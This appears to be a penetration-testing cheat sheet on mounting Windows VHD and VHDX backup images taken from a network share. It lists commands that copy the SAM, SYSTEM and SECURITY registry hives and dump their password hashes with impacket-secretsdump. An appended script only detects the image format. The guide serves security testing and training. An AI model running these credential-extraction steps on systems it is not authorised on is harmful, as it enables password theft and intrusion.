Mounting VHD and VHDX
Overview
Virtual Hard Disk (VHD) and Virtual Hard Disk X (VHDX) files are used by Windows for virtual machines, backups and system snapshots. These files can contain the SAM and SYSTEM registry hives, which store password hashes and other sensitive information.
Mounting VHD/VHDX files allows you to extract files and extract password hashes using tools like impacket-secretsdump.
Mounting VHD Files
Step 1: Install Necessary Tools
apt install libguestfs-tools cifs-utils
Step 2: Mount the Network Share
mount -t cifs //192.168.29.18/backup -o user=guest,password= /mnt/backup
Step 3: Mount the VHD file
guestmount --add /mnt/backup/vhdfile.vhd --inspector --ro /mnt/vhd -v
Alternatively, you can mount a specific VHD file directly:
guestmount -a /mnt/d1/system.vhd -i -r /mnt/d2 -v
Step 4: Extract SAM and SYSTEM Files
cp /mnt/vhd/Windows/System32/config/SAM /tmp/
cp /mnt/vhd/Windows/System32/config/SYSTEM /tmp/
Step 5: Extract Password Hashes
impacket-secretsdump -sam /tmp/SAM -system /tmp/SYSTEM local
Mounting VHDX Files
Step 1: Install Necessary Tools
apt install libguestfs-tools nautilus qemu-utils nbd-client
Step 2: Load NBD Module
Check if the nbd module is loaded:
lsmod | grep nbd
If not loaded, load it manually:
modprobe nbd
If needed, unload and reload the module:
rmmod nbd
modprobe nbd
Step 3: Check Available NBD Devices
ls -l /dev/nbd*
Step 4: Identify the Connected Drive
lsblk
blkid
Step 5: Attach the VHDX file to NBD
qemu-nbd -c /dev/nbd0 /tmp/<name>.vhdx
Step 6: Read Partition table
partprobe
partprobe /dev/nbd0
Step 7: Confirm Partition Mapping
ls -l /dev/nbd*
Step 8: Mount the Partition
mount -t ntfs /dev/nbd0p2 /mnt/d1
Step 9: Extract SAM, SYSTEM and SECURITY Files
cp /mnt/d1/Windows/System32/config/SAM /tmp
cp /mnt/d1/Windows/System32/config/SYSTEM /tmp
cp /mnt/d1/Windows/System32/config/SECURITY /tmp
Step 10: Extract Password Hashes
impacket-secretsdump -sam /tmp/SAM -system /tmp/SYSTEM -security /tmp/SECURITY local
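Added example (not part of the original page): a shell script that checks a disk image's on-disk signature to decide which of the two procedures above applies, rather than trusting the file extension. The function names and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example: classify a disk image by its on-disk signature.
# VHD:  the 512-byte footer at the end of the file begins with "conectix"
#       (dynamic/differencing VHDs also keep a copy at offset 0).
# VHDX: the file begins with the 8-byte signature "vhdxfile".

# Read 8 bytes from stdin and keep only lowercase letters, so NUL or other
# binary bytes never reach a shell variable.
sig8() { head -c 8 | LC_ALL=C tr -cd 'a-z'; }

detect_vdisk_format() {
    f=$1
    [ -r "$f" ] || { echo "unreadable"; return 1; }
    start=$(sig8 < "$f")
    end=$(tail -c 512 "$f" | sig8)
    if [ "$start" = "vhdxfile" ]; then
        echo "vhdx"
    elif [ "$end" = "conectix" ] || [ "$start" = "conectix" ]; then
        echo "vhd"
    else
        echo "unknown"
    fi
}

# Map the detected format to the matching procedure on this page.
suggest_procedure() {
    case $(detect_vdisk_format "$1") in
        vhd)  echo "guestmount (Mounting VHD Files)" ;;
        vhdx) echo "qemu-nbd (Mounting VHDX Files)" ;;
        *)    echo "not a VHD/VHDX image" ;;
    esac
}

# Build constructed sample files (signature bytes plus zero padding only).
make_samples() {
    d=$1
    { printf 'vhdxfile'; head -c 1016 /dev/zero; } > "$d/a.vhdx"
    { head -c 2048 /dev/zero; printf 'conectix'; head -c 504 /dev/zero; } > "$d/fixed.vhd"
    head -c 1024 /dev/zero > "$d/blank.img"
}

# Stand-alone use: ./script.sh /mnt/backup/vhdfile.vhd
if [ $# -gt 0 ]; then suggest_procedure "$1"; fi
```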